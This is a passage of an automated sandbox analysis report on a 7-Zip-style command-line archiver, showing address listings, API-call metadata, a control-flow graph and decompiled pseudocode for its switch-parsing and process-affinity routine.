                                                                                                    0x003e9060
                                                                                                    0x003e9064
                                                                                                    0x003e9069
                                                                                                    0x003e9069
                                                                                                    0x003e906a
                                                                                                    0x003e906a
                                                                                                    0x003e9070
                                                                                                    0x003e9076
                                                                                                    0x003e9082
                                                                                                    0x003e9090
                                                                                                    0x003e909c
                                                                                                    0x003e90a9
                                                                                                    0x003e90af
                                                                                                    0x003e90b5
                                                                                                    0x003e90bb
                                                                                                    0x003e90c3
                                                                                                    0x003e90d4
                                                                                                    0x003e90d8
                                                                                                    0x003e90df
                                                                                                    0x003e90ee
                                                                                                    0x003e90f1
                                                                                                    0x003e9100
                                                                                                    0x003e9104
                                                                                                    0x003e9109
                                                                                                    0x003e910e
                                                                                                    0x003e9110
                                                                                                    0x003e9112
                                                                                                    0x003e9114
                                                                                                    0x003e9114
                                                                                                    0x003e911a
                                                                                                    0x003e9128
                                                                                                    0x003e912c
                                                                                                    0x003e9133
                                                                                                    0x003e913a
                                                                                                    0x003e9143
                                                                                                    0x003e914c
                                                                                                    0x003e9163
                                                                                                    0x003e9169
                                                                                                    0x003e9174
                                                                                                    0x003e9174
                                                                                                    0x00000000
                                                                                                    0x003e904c
                                                                                                    0x003e8e4a
                                                                                                    0x003e8e51
                                                                                                    0x003e8e53
                                                                                                    0x003e8e59
                                                                                                    0x003e8e66
                                                                                                    0x003e8e66
                                                                                                    0x003e8e59
                                                                                                    0x003e8e71
                                                                                                    0x003e8e76
                                                                                                    0x003e8e7b
                                                                                                    0x003e8e7e
                                                                                                    0x003e8e85
                                                                                                    0x003e8e8b
                                                                                                    0x003e8e90
                                                                                                    0x003e8e94
                                                                                                    0x003e8e9a
                                                                                                    0x003e8ea0
                                                                                                    0x003e8eb0
                                                                                                    0x003e8eb0
                                                                                                    0x003e8eb0
                                                                                                    0x003e8eb0
                                                                                                    0x00000000
                                                                                                    0x003e8ea2
                                                                                                    0x003e8ea2
                                                                                                    0x003e8ea8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e8eaa
                                                                                                    0x003e8eb4
                                                                                                    0x003e8ebd
                                                                                                    0x003e8eca
                                                                                                    0x003e8ed5
                                                                                                    0x003e8ee0
                                                                                                    0x003e8ee2
                                                                                                    0x003e8eeb
                                                                                                    0x003e8eef
                                                                                                    0x003e8ef5
                                                                                                    0x003e8efa
                                                                                                    0x003e8efa
                                                                                                    0x003e8efb
                                                                                                    0x003e8efb
                                                                                                    0x003e8f04
                                                                                                    0x003e8f0b
                                                                                                    0x003e8f11
                                                                                                    0x003e8f24
                                                                                                    0x003e8f24
                                                                                                    0x003e8f24
                                                                                                    0x003e8f24
                                                                                                    0x00000000
                                                                                                    0x003e8f13
                                                                                                    0x003e8f13
                                                                                                    0x003e8f19
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e8f1b
                                                                                                    0x003e8f2b
                                                                                                    0x003e8f38
                                                                                                    0x003e8f43
                                                                                                    0x003e8f49
                                                                                                    0x003e8f55
                                                                                                    0x003e8f5b
                                                                                                    0x003e8f63
                                                                                                    0x003e8f6d
                                                                                                    0x003e8f73
                                                                                                    0x003e8f79
                                                                                                    0x003e8f7f
                                                                                                    0x003e8fb5
                                                                                                    0x003e8fb9
                                                                                                    0x003e8fbe
                                                                                                    0x003e8fc5
                                                                                                    0x003e8fc8
                                                                                                    0x003e8fd2
                                                                                                    0x003e8fd2
                                                                                                    0x003e8fd7
                                                                                                    0x003e8fdc
                                                                                                    0x003e8fde
                                                                                                    0x003e8fe0
                                                                                                    0x003e8fe2
                                                                                                    0x003e8fe2
                                                                                                    0x003e8fe8
                                                                                                    0x003e8fea
                                                                                                    0x003e8fee
                                                                                                    0x003e8ffa
                                                                                                    0x003e9001
                                                                                                    0x003e900a
                                                                                                    0x003e9010
                                                                                                    0x003e901c
                                                                                                    0x003e9022
                                                                                                    0x003e902c
                                                                                                    0x003e9037
                                                                                                    0x003e903b
                                                                                                    0x00000000
                                                                                                    0x003e903b
                                                                                                    0x003e8f11
                                                                                                    0x003e8ea0
                                                                                                    0x003e8dc4
                                                                                                    0x003e8dca
                                                                                                    0x003e8dcc
                                                                                                    0x003e8dce
                                                                                                    0x003e8dce
                                                                                                    0x003e8de1
                                                                                                    0x003e8de6
                                                                                                    0x003e8de9
                                                                                                    0x003e8dec
                                                                                                    0x003e8df4
                                                                                                    0x003e8df9
                                                                                                    0x003e8dfe
                                                                                                    0x003e8e00
                                                                                                    0x003e8e09
                                                                                                    0x003e8e10
                                                                                                    0x003e8e11
                                                                                                    0x003e8e18
                                                                                                    0x003e8e18
                                                                                                    0x00000000
                                                                                                    0x003e8964
                                                                                                    0x003e8964
                                                                                                    0x003e896c
                                                                                                    0x003e896e
                                                                                                    0x003e896e
                                                                                                    0x003e8975
                                                                                                    0x003e8981
                                                                                                    0x003e898b
                                                                                                    0x003e899a
                                                                                                    0x003e899d
                                                                                                    0x003e89a4
                                                                                                    0x003e89ad
                                                                                                    0x003e89af
                                                                                                    0x003e89b5
                                                                                                    0x003e89b8
                                                                                                    0x003e89bb
                                                                                                    0x003e8c3c
                                                                                                    0x003e8c3e
                                                                                                    0x003e8c4a
                                                                                                    0x003e8c54
                                                                                                    0x003e8c59
                                                                                                    0x003e8c64
                                                                                                    0x003e8d23
                                                                                                    0x003e8d25
                                                                                                    0x003e8d31
                                                                                                    0x003e8d3b
                                                                                                    0x003e8d40
                                                                                                    0x003e8d4b
                                                                                                    0x003e9a3a
                                                                                                    0x003e9a41
                                                                                                    0x003e9a4c
                                                                                                    0x003e9a4c
                                                                                                    0x003e9a5f
                                                                                                    0x003e9a65
                                                                                                    0x003e9a6f
                                                                                                    0x003e9a74
                                                                                                    0x003e9a77
                                                                                                    0x003e9a7b
                                                                                                    0x003e9a7d
                                                                                                    0x003e9a82
                                                                                                    0x003e9a82
                                                                                                    0x003e9a8b
                                                                                                    0x003e9a8f
                                                                                                    0x003e9a9b
                                                                                                    0x003e9aa0
                                                                                                    0x003e9aaa
                                                                                                    0x003e9aaf
                                                                                                    0x003e9ab6
                                                                                                    0x003e9abb
                                                                                                    0x003e9ac4
                                                                                                    0x003e9acc
                                                                                                    0x003e9acc
                                                                                                    0x003e8d51
                                                                                                    0x003e8d58
                                                                                                    0x003e8d60
                                                                                                    0x003e8d62
                                                                                                    0x003e8d67
                                                                                                    0x003e8d6e
                                                                                                    0x003e8d77
                                                                                                    0x003e8d83
                                                                                                    0x003e8d8c
                                                                                                    0x003e8d90
                                                                                                    0x003e8d94
                                                                                                    0x003e8d9a
                                                                                                    0x003e8d9f
                                                                                                    0x003e8da4
                                                                                                    0x003e8da7
                                                                                                    0x003e8dae
                                                                                                    0x003e8dae
                                                                                                    0x00000000
                                                                                                    0x003e8db6
                                                                                                    0x003e8c6a
                                                                                                    0x003e8c71
                                                                                                    0x003e8c74
                                                                                                    0x003e8c79
                                                                                                    0x003e8c7b
                                                                                                    0x003e8c80
                                                                                                    0x003e8c86
                                                                                                    0x003e8c95
                                                                                                    0x003e8c88
                                                                                                    0x003e8c8c
                                                                                                    0x003e8c8f
                                                                                                    0x003e8cae
                                                                                                    0x003e8cc3
                                                                                                    0x003e8cd9
                                                                                                    0x003e8cdf
                                                                                                    0x003e8cec
                                                                                                    0x003e8cf5
                                                                                                    0x003e8cf9
                                                                                                    0x003e8cfd
                                                                                                    0x003e8d03
                                                                                                    0x003e8d08
                                                                                                    0x003e8d0d
                                                                                                    0x003e8d10
                                                                                                    0x003e8d17
                                                                                                    0x003e8d17
                                                                                                    0x00000000
                                                                                                    0x003e8c71
                                                                                                    0x003e89c1
                                                                                                    0x003e89d1
                                                                                                    0x003e89ee
                                                                                                    0x003e89f0
                                                                                                    0x003e89f4
                                                                                                    0x003e89fb
                                                                                                    0x003e8a3e
                                                                                                    0x003e8a42
                                                                                                    0x003e8a4a
                                                                                                    0x003e8a98
                                                                                                    0x003e8a9c
                                                                                                    0x003e8aa7
                                                                                                    0x003e8ab0
                                                                                                    0x003e8ab7
                                                                                                    0x003e8abc
                                                                                                    0x003e8ac4
                                                                                                    0x003e8ac8
                                                                                                    0x003e8b27
                                                                                                    0x003e8b29
                                                                                                    0x003e8b2e
                                                                                                    0x003e8b37
                                                                                                    0x003e8b3f
                                                                                                    0x003e8b48
                                                                                                    0x003e8b5e
                                                                                                    0x003e8b61
                                                                                                    0x003e8b62
                                                                                                    0x003e8b6a
                                                                                                    0x003e8c16
                                                                                                    0x003e8c18
                                                                                                    0x003e8c1d
                                                                                                    0x003e8c24
                                                                                                    0x003e8c29
                                                                                                    0x003e8c36
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e8b70
                                                                                                    0x003e8b70
                                                                                                    0x003e8b74
                                                                                                    0x003e8b7d
                                                                                                    0x003e8b84
                                                                                                    0x003e8b8b
                                                                                                    0x003e8b8f
                                                                                                    0x003e8b92
                                                                                                    0x003e8b99
                                                                                                    0x003e8b9b
                                                                                                    0x003e8b9f
                                                                                                    0x003e8ba5
                                                                                                    0x003e8ba7
                                                                                                    0x003e8bab
                                                                                                    0x003e8bb1
                                                                                                    0x003e8bb6
                                                                                                    0x003e8bbc
                                                                                                    0x003e8bbf
                                                                                                    0x003e8bc2
                                                                                                    0x003e8bc8
                                                                                                    0x003e8bcf
                                                                                                    0x003e8bcf
                                                                                                    0x003e8bca
                                                                                                    0x003e8bca
                                                                                                    0x003e8bca
                                                                                                    0x003e8bd8
                                                                                                    0x003e8bde
                                                                                                    0x003e8be5
                                                                                                    0x003e8bec
                                                                                                    0x003e8bec
                                                                                                    0x003e8be7
                                                                                                    0x003e8be7
                                                                                                    0x003e8be7
                                                                                                    0x003e8be5
                                                                                                    0x003e8bf5
                                                                                                    0x003e8bf7
                                                                                                    0x003e8bfa
                                                                                                    0x003e8c02
                                                                                                    0x003e8b9b
                                                                                                    0x003e8c07
                                                                                                    0x003e8c0d
                                                                                                    0x00000000
                                                                                                    0x003e8b70
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e8aca
                                                                                                    0x003e8aca
                                                                                                    0x003e8aca
                                                                                                    0x003e8ace
                                                                                                    0x003e8ad3
                                                                                                    0x003e8ad3
                                                                                                    0x003e8ae5
                                                                                                    0x003e8ae8
                                                                                                    0x003e8af4
                                                                                                    0x003e8afe
                                                                                                    0x003e8b0d
                                                                                                    0x003e8b17
                                                                                                    0x003e8b17
                                                                                                    0x003e8b1c
                                                                                                    0x003e8b22
                                                                                                    0x003e8b22
                                                                                                    0x00000000
                                                                                                    0x003e8aca
                                                                                                    0x003e8a4c
                                                                                                    0x003e8a54
                                                                                                    0x003e8a82
                                                                                                    0x003e8a87
                                                                                                    0x003e8a8b
                                                                                                    0x003e8a94
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e8a56
                                                                                                    0x003e8a56
                                                                                                    0x003e8a56
                                                                                                    0x003e8a5b
                                                                                                    0x003e8a61
                                                                                                    0x003e8a6b
                                                                                                    0x003e8a63
                                                                                                    0x003e8a63
                                                                                                    0x003e8a63
                                                                                                    0x003e8a63
                                                                                                    0x003e8a73
                                                                                                    0x003e8a75
                                                                                                    0x003e8a7d
                                                                                                    0x00000000
                                                                                                    0x003e8a56
                                                                                                    0x003e89fd
                                                                                                    0x003e89fd
                                                                                                    0x003e8a02
                                                                                                    0x003e8a07
                                                                                                    0x003e8a27
                                                                                                    0x003e8a27
                                                                                                    0x00000000
                                                                                                    0x003e8a09
                                                                                                    0x003e8a09
                                                                                                    0x003e8a29
                                                                                                    0x003e8a2f
                                                                                                    0x003e8a31
                                                                                                    0x003e8a3c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e8a3c
                                                                                                    0x003e8a07
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e88f7
                                                                                                    0x003e88f7
                                                                                                    0x003e88f7
                                                                                                    0x003e88fa
                                                                                                    0x003e88fd
                                                                                                    0x003e8909
                                                                                                    0x003e890f
                                                                                                    0x003e8913
                                                                                                    0x003e891b
                                                                                                    0x003e8a11
                                                                                                    0x003e8a16
                                                                                                    0x003e8a1b
                                                                                                    0x003e8a21
                                                                                                    0x003e8a22
                                                                                                    0x003e8a22
                                                                                                    0x003e8a22
                                                                                                    0x003e8936
                                                                                                    0x003e893b
                                                                                                    0x003e8942
                                                                                                    0x003e8947
                                                                                                    0x003e894f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e894f
                                                                                                    0x00000000
                                                                                                    0x003e88f7
                                                                                                    0x003e8863
                                                                                                    0x003e887d
                                                                                                    0x003e887d
                                                                                                    0x003e8882
                                                                                                    0x003e8887
                                                                                                    0x003e888d
                                                                                                    0x003e888e
                                                                                                    0x00000000
                                                                                                    0x003e886e
                                                                                                    0x003e8874
                                                                                                    0x003e8879
                                                                                                    0x003e887b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e887b

                                                                                                    APIs
                                                                                                      • Part of subcall function 003EA3CD: fputs.MSVCRT ref: 003EA3E6
                                                                                                      • Part of subcall function 003EA3CD: fputs.MSVCRT ref: 003EA3FD
                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 003E87D4
                                                                                                    • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 003E87DB
                                                                                                    • _CxxThrowException.MSVCRT(?,00430AD8), ref: 003E888E
                                                                                                    • _CxxThrowException.MSVCRT(?,00430AD8), ref: 003E88D2
                                                                                                      • Part of subcall function 003B1FB3: __EH_prolog.LIBCMT ref: 003B1FB8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                                                                                                    • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$S
                                                                                                    • API String ID: 377453556-626468309
                                                                                                    • Opcode ID: 5d766d868451cedc883ac6d7bb763e314de0ae2c0834723ab291d8621845d99c
                                                                                                    • Instruction ID: 23a9fb23e979e1ffb4c3f2f432602f833fe3a04f53c90b3e3b795def0dc9c2b5
                                                                                                    • Opcode Fuzzy Hash: 5d766d868451cedc883ac6d7bb763e314de0ae2c0834723ab291d8621845d99c
                                                                                                    • Instruction Fuzzy Hash: 6322AF31D00269DFDF16EF95D885BADBBB1EF48300F60015AE548AB2D2CB349A85CF65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C06F0 Relevance: 42.3, APIs: 16, Strings: 8, Instructions: 288COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 672 3c06f0-3c0726 call 41f1b0 call 3b13f5 677 3c0728-3c073f call 3d097c _CxxThrowException 672->677 678 3c0744-3c079d _fileno _isatty _fileno _isatty _fileno _isatty 672->678 677->678 680 3c07af-3c07b1 678->680 681 3c079f-3c07a3 678->681 683 3c07b2-3c07df 680->683 681->680 682 3c07a5-3c07a9 681->682 682->680 685 3c07ab-3c07ad 682->685 686 3c080b-3c0824 683->686 687 3c07e1-3c080a call 3c0ab6 call 3b276e call 3b1e40 683->687 685->683 689 3c0826-3c082a 686->689 690 3c0832 686->690 687->686 689->690 692 3c082c-3c0830 689->692 693 3c0839-3c083d 690->693 692->690 692->693 694 3c083f 693->694 695 3c0846-3c0850 693->695 694->695 697 3c085b-3c0865 695->697 698 3c0852-3c0855 695->698 700 3c0867-3c086a 697->700 701 3c0870-3c087a 697->701 698->697 700->701 703 3c087c-3c087f 701->703 704 3c0885-3c088b 701->704 703->704 706 3c088d-3c0899 704->706 707 3c08db-3c08e4 704->707 710 3c089b-3c08a5 706->710 711 3c08a7-3c08b3 call 3c0ae3 706->711 708 3c08fc call 3c0acb 707->708 709 3c08e6-3c08f8 707->709 714 3c0901-3c090a 708->714 709->708 710->707 718 3c08b5-3c08cd call 3d097c _CxxThrowException 711->718 719 3c08d2-3c08d5 711->719 716 3c090c-3c091c 714->716 717 3c0949-3c0952 714->717 722 3c09d4-3c09e6 wcscmp 716->722 723 3c0922 716->723 720 3c0958-3c0964 717->720 721 3c0aa5-3c0ab3 717->721 718->719 719->707 720->721 727 3c096a-3c09a5 call 3b2690 call 3b27bf call 3b3164 call 3b3be3 720->727 725 3c09ec-3c09f8 call 3c0ae3 722->725 726 3c0929-3c0931 call 3b906f 722->726 723->726 725->726 735 3c09fe-3c0a16 call 3d097c _CxxThrowException 725->735 726->717 737 3c0933-3c0944 call 40b390 call 3b8fe9 726->737 756 3c09a7-3c09ae 727->756 757 3c09b1-3c09b5 727->757 744 3c0a1b-3c0a1e 735->744 737->717 747 3c0a20 744->747 748 3c0a43-3c0a5c call 3c0b1e GetCurrentProcess SetProcessAffinityMask 744->748 751 3c0a26-3c0a3e call 3d097c _CxxThrowException 747->751 752 3c0a22-3c0a24 747->752 759 3c0a5e-3c0a94 GetLastError call 3b3164 call 3b557f call 3b3128 call 3b1e40 748->759 760 3c0a95-3c0aa4 call 3b30b5 call 3b1e40 748->760 751->748 752->748 752->751 756->757 757->744 762 3c09b7-3c09cf call 3d097c _CxxThrowException 757->762 759->760 760->721 762->722
                                                                                                    C-Code - Quality: 63%
                                                                                                    			E003C06F0(long __ecx, void* __edx, void* __eflags) {
				signed short** _t110;
				void* _t112;
				void* _t113;
				signed int _t114;
				signed int _t124;
				char* _t126;
				char* _t141;
				char* _t143;
				char* _t145;
				void* _t146;
				signed int _t147;
				wchar_t*** _t149;
				int _t157;
				long _t159;
				void* _t161;
				void* _t162;
				void* _t171;
				signed int _t176;
				void* _t186;
				void* _t187;
				void* _t221;
				intOrPtr* _t227;
				long _t228;
				signed int _t229;
				char* _t233;
				wchar_t** _t235;
				void* _t237;
				void* _t278;

				E0041F1B0(E00423600, _t237);
				_push( *(_t237 + 8));
				 *(_t237 - 0x10) = __ecx;
				 *(__ecx + 0x30) =  *(__ecx + 0x30) & 0x00000000;
				_t110 = __ecx + 0x2c;
				 *(_t237 - 0x14) = _t110;
				_push(0x3d);
				_push(0x43a148);
				 *( *_t110) =  *( *_t110) & 0x00000000;
				_t112 = E003B13F5(__ecx, __eflags);
				_t244 = _t112;
				if(_t112 == 0) {
					_push( *((intOrPtr*)(__ecx + 0x20)));
					_push( *((intOrPtr*)(__ecx + 0x14)));
					E003D097C(_t237 - 0x2c, _t244);
					_push(0x431428);
					_push(_t237 - 0x2c);
					L0041F1D0();
				}
				_t227 = __imp___fileno; // 0x77793130
				_t113 =  *_t227(__imp___iob);
				_t192 = __imp___isatty;
				_t114 =  *_t192(_t113);
				_t233 =  *((intOrPtr*)(_t237 + 0xc));
				 *((char*)(_t233 + 3)) = _t114 & 0xffffff00 | _t114 != 0x00000000;
				 *((char*)(_t233 + 4)) =  *_t192( *_t227(__imp___iob + 0x20)) & 0xffffff00 | _t119 != 0x00000000;
				_t124 =  *_t192( *_t227(__imp___iob + 0x40));
				_t228 =  *(_t237 - 0x10);
				 *((char*)(_t233 + 5)) = _t124 & 0xffffff00 | _t124 != 0x00000000;
				_t126 =  *_t228;
				if( *_t126 != 0 ||  *((char*)(_t126 + 0x14)) != 0 ||  *((char*)(_t126 + 0x28)) != 0) {
					_push(1);
					_pop(0);
				}
				 *_t233 = 0;
				 *((char*)(_t233 + 6)) =  *((intOrPtr*)( *_t228 + 0x26c));
				 *((char*)(_t233 + 7)) =  *((intOrPtr*)( *_t228 + 0x280));
				 *((char*)(_t233 + 8)) =  *_t228 & 0xffffff00 |  *((char*)( *_t228 + 0x3c)) == 0x00000000;
				if( *((char*)( *_t228 + 0x2e4)) != 0) {
					_t186 = E003C0AB6();
					 *(_t237 - 4) =  *(_t237 - 4) & 0x00000000;
					_t187 = E003B276E(_t233 + 0x1c, _t186);
					 *(_t237 - 4) =  *(_t237 - 4) | 0xffffffff;
					E003B1E40(_t187,  *((intOrPtr*)(_t237 - 0x2c)));
				}
				 *((char*)(_t233 + 0xb)) =  *((intOrPtr*)( *_t228 + 0x2d0));
				 *((char*)(_t233 + 0xc)) =  *((intOrPtr*)( *_t228 + 0x64));
				if( *((char*)( *_t228 + 0x50)) != 0 ||  *((char*)(_t233 + 7)) != 0 ||  *((char*)(_t233 + 4)) == 0) {
					 *(_t233 + 0x228) =  *(_t233 + 0x228) & 0x00000000;
				}
				if( *((char*)(_t233 + 7)) != 0) {
					 *(_t233 + 0x220) =  *(_t233 + 0x220) & 0x00000000;
				}
				_t141 =  *_t228 + 0x8c;
				if( *_t141 != 0) {
					 *(_t233 + 0x220) =  *(_t141 + 4);
				}
				_t143 =  *_t228 + 0xa0;
				if( *_t143 != 0) {
					 *((intOrPtr*)(_t233 + 0x224)) =  *((intOrPtr*)(_t143 + 4));
				}
				_t145 =  *_t228 + 0xb4;
				if( *_t145 != 0) {
					 *(_t233 + 0x228) =  *(_t145 + 4);
				}
				_t146 =  *_t228;
				if( *((char*)(_t146 + 0x78)) != 0) {
					_t192 =  *( *(_t146 + 0x80));
					if(_t192[1] != 0) {
						__eflags = E003C0AE3( *_t192, _t237 + 8);
						if(__eflags == 0) {
							_push( *_t192);
							_push("Unsupported switch postfix -bb");
							E003D097C(_t237 - 0x2c, __eflags);
							_push(0x431428);
							_push(_t237 - 0x2c);
							L0041F1D0();
						}
						 *(_t233 + 0x22c) =  *(_t237 + 8);
					} else {
						 *(_t233 + 0x22c) = 1;
					}
				}
				_t147 =  *_t228;
				if( *((char*)(_t147 + 0x334)) != 0) {
					_t176 = _t147 & 0xffffff00 |  *((char*)(_t147 + 0x335)) == 0x00000000;
					 *0x43a5c0 = _t176;
					 *(_t233 + 2) = _t176;
					 *((char*)(_t233 + 1)) = 1;
				}
				E003C0ACB(); // executed
				_t149 =  *_t228;
				if(_t149[0xa5] == 0) {
					L34:
					_t229 =  *_t228;
					if( *((char*)(_t229 + 0x208)) == 0) {
						goto L50;
					}
					_t149 =  *(_t229 + 0x210);
					_t235 =  *_t149;
					if(_t235[1] == 0) {
						goto L50;
					}
					E003B2690(_t237 - 0x20);
					 *(_t237 - 4) = 1;
					E003B27BF(_t237 - 0x20,  *_t235);
					_t192 =  *(_t237 - 0x14);
					E003B3164( *(_t237 - 0x14), "Set process affinity mask: ");
					_t221 = _t237 + 8;
					_t228 = L003B3BE3( *(_t237 - 0x20), _t221);
					if( *( *(_t237 + 8)) != 0) {
						 *(_t237 - 0x1c) =  *(_t237 - 0x1c) & 0x00000000;
						 *( *(_t237 - 0x20)) =  *( *(_t237 - 0x20)) & 0x00000000;
					}
					_t275 =  *(_t237 - 0x1c);
					if( *(_t237 - 0x1c) != 0) {
						goto L43;
					} else {
						_push( *_t235);
						_push("Unsupported switch postfix -stm");
						E003D097C(_t237 - 0x2c, _t275);
						_push(0x431428);
						_push(_t237 - 0x2c);
						L0041F1D0();
						goto L40;
					}
				} else {
					 *(_t237 + 8) =  *(_t237 + 8) & 0x00000000;
					_t235 =  *(_t149[0xa7]);
					if(_t235[1] != 0) {
						L40:
						if(wcscmp( *_t235, "-") == 0) {
							L32:
							_t149 = E003B906F();
							if( *(_t237 + 8) > _t149) {
								E0040B390();
								_t149 = E003B8FE9(L"SeLockMemoryPrivilege", 1);
								 *0x43a718 = _t149;
							}
							goto L34;
						}
						_t221 = _t237 + 8;
						_t171 = E003C0AE3( *_t235, _t221);
						_t277 = _t171;
						if(_t171 != 0) {
							goto L32;
						}
						_push( *_t235);
						_push("Unsupported switch postfix for -slp");
						E003D097C(_t237 - 0x2c, _t277);
						_push(0x431428);
						_push(_t237 - 0x2c);
						L0041F1D0();
						L43:
						_t278 = _t221 - 1;
						if(_t278 < 0) {
							L47:
							E003C0B1E(_t192, _t228, _t221);
							_t157 = SetProcessAffinityMask(GetCurrentProcess(), _t228);
							_t280 = _t157;
							if(_t157 == 0) {
								_t159 = GetLastError();
								E003B3164(_t192, " : ERROR : ");
								_t161 = E003B557F(_t237 - 0x38, _t159, _t280);
								 *(_t237 - 4) = 2;
								_t162 = E003B3128(_t192, _t280, _t161);
								 *(_t237 - 4) = 1;
								E003B1E40(_t162,  *((intOrPtr*)(_t237 - 0x38)));
							}
							_t149 = E003B1E40(E003B30B5(_t192),  *(_t237 - 0x20));
							L50:
							 *[fs:0x0] =  *((intOrPtr*)(_t237 - 0xc));
							return _t149;
						}
						if(_t278 > 0) {
							L46:
							_push( *_t235);
							_push("unsupported value -stm");
							E003D097C(_t237 - 0x2c, _t279);
							_push(0x431428);
							_push(_t237 - 0x2c);
							L0041F1D0();
							goto L47;
						}
						_t279 = _t228;
						if(_t228 < 0) {
							goto L47;
						}
						goto L46;
					}
					 *(_t237 + 8) = 1;
					goto L32;
				}
			}































                                                                                                    0x003c06f5
                                                                                                    0x003c0702
                                                                                                    0x003c0705
                                                                                                    0x003c0708
                                                                                                    0x003c070c
                                                                                                    0x003c070f
                                                                                                    0x003c0712
                                                                                                    0x003c0716
                                                                                                    0x003c071b
                                                                                                    0x003c071f
                                                                                                    0x003c0724
                                                                                                    0x003c0726
                                                                                                    0x003c0728
                                                                                                    0x003c072e
                                                                                                    0x003c0731
                                                                                                    0x003c0739
                                                                                                    0x003c073e
                                                                                                    0x003c073f
                                                                                                    0x003c073f
                                                                                                    0x003c074a
                                                                                                    0x003c0750
                                                                                                    0x003c0752
                                                                                                    0x003c0759
                                                                                                    0x003c075b
                                                                                                    0x003c0763
                                                                                                    0x003c0779
                                                                                                    0x003c0788
                                                                                                    0x003c078a
                                                                                                    0x003c0795
                                                                                                    0x003c0798
                                                                                                    0x003c079d
                                                                                                    0x003c07af
                                                                                                    0x003c07b1
                                                                                                    0x003c07b1
                                                                                                    0x003c07b2
                                                                                                    0x003c07bc
                                                                                                    0x003c07c7
                                                                                                    0x003c07d3
                                                                                                    0x003c07df
                                                                                                    0x003c07ec
                                                                                                    0x003c07f1
                                                                                                    0x003c07f9
                                                                                                    0x003c0801
                                                                                                    0x003c0805
                                                                                                    0x003c080a
                                                                                                    0x003c0813
                                                                                                    0x003c081b
                                                                                                    0x003c0824
                                                                                                    0x003c0832
                                                                                                    0x003c0832
                                                                                                    0x003c083d
                                                                                                    0x003c083f
                                                                                                    0x003c083f
                                                                                                    0x003c0848
                                                                                                    0x003c0850
                                                                                                    0x003c0855
                                                                                                    0x003c0855
                                                                                                    0x003c085d
                                                                                                    0x003c0865
                                                                                                    0x003c086a
                                                                                                    0x003c086a
                                                                                                    0x003c0872
                                                                                                    0x003c087a
                                                                                                    0x003c087f
                                                                                                    0x003c087f
                                                                                                    0x003c0885
                                                                                                    0x003c088b
                                                                                                    0x003c0893
                                                                                                    0x003c0899
                                                                                                    0x003c08b1
                                                                                                    0x003c08b3
                                                                                                    0x003c08b5
                                                                                                    0x003c08ba
                                                                                                    0x003c08bf
                                                                                                    0x003c08c7
                                                                                                    0x003c08cc
                                                                                                    0x003c08cd
                                                                                                    0x003c08cd
                                                                                                    0x003c08d5
                                                                                                    0x003c089b
                                                                                                    0x003c089b
                                                                                                    0x003c089b
                                                                                                    0x003c0899
                                                                                                    0x003c08db
                                                                                                    0x003c08e4
                                                                                                    0x003c08ed
                                                                                                    0x003c08f0
                                                                                                    0x003c08f5
                                                                                                    0x003c08f8
                                                                                                    0x003c08f8
                                                                                                    0x003c08fc
                                                                                                    0x003c0901
                                                                                                    0x003c090a
                                                                                                    0x003c0949
                                                                                                    0x003c0949
                                                                                                    0x003c0952
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c0958
                                                                                                    0x003c095e
                                                                                                    0x003c0964
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c096d
                                                                                                    0x003c0977
                                                                                                    0x003c097e
                                                                                                    0x003c0983
                                                                                                    0x003c098d
                                                                                                    0x003c0995
                                                                                                    0x003c099d
                                                                                                    0x003c09a5
                                                                                                    0x003c09aa
                                                                                                    0x003c09ae
                                                                                                    0x003c09ae
                                                                                                    0x003c09b1
                                                                                                    0x003c09b5
                                                                                                    0x00000000
                                                                                                    0x003c09b7
                                                                                                    0x003c09b7
                                                                                                    0x003c09bc
                                                                                                    0x003c09c1
                                                                                                    0x003c09c9
                                                                                                    0x003c09ce
                                                                                                    0x003c09cf
                                                                                                    0x00000000
                                                                                                    0x003c09cf
                                                                                                    0x003c090c
                                                                                                    0x003c090c
                                                                                                    0x003c0916
                                                                                                    0x003c091c
                                                                                                    0x003c09d4
                                                                                                    0x003c09e6
                                                                                                    0x003c0929
                                                                                                    0x003c0929
                                                                                                    0x003c0931
                                                                                                    0x003c0933
                                                                                                    0x003c093f
                                                                                                    0x003c0944
                                                                                                    0x003c0944
                                                                                                    0x00000000
                                                                                                    0x003c0931
                                                                                                    0x003c09ee
                                                                                                    0x003c09f1
